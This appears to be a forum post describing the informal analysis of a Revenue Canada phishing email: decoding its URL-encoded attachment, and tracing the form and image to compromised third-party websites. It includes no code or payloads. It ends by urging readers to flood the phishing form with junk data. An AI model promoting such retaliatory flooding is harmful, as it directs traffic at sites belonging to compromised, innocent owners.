We received a phishing email at our resume@ email address this morning. Apparently, it was from the Revenue Canada looking for my tax information. Luckily, my HR girl is awesome and didn't open it and just forwarded it to me to look at!
When I opened the file, it was all URL encoded to obfuscate the actual code. Nifty, but very easy to get around. I copied the obfuscated code, wrote a three line PHP script and pasted the code into it. Out came a text file with the actual HTML. Upon inspection, it looks like the header image from the CRA is actually being hosted on a radio station's website a mere five hours away! The PHP script that the form is submitted to, as well as some javascript input validation code, is hosted on some Nigerian university's website (surprise surprise?).
So after finding the contents of the file rather harmless, I decided to have a little fun. I did the only thing I could think of to get back at them, and I filled the form out a few times with completely random and rather obscene info. Then I emailed the two website owners to notify them that they were most likely hacked and should consider changing passwords, patching, and deleting the offending content.
Not exactly what I thought I'd be doing this morning, but hey... it was kinda fun playing detective :)
Is there some place I should/could be submitting this "analysis" to, like Webroot, or Sophos or something?
Anyone interested in helping to "spread the joy" and overload them with more random crap info for a while until it finally gets taken down?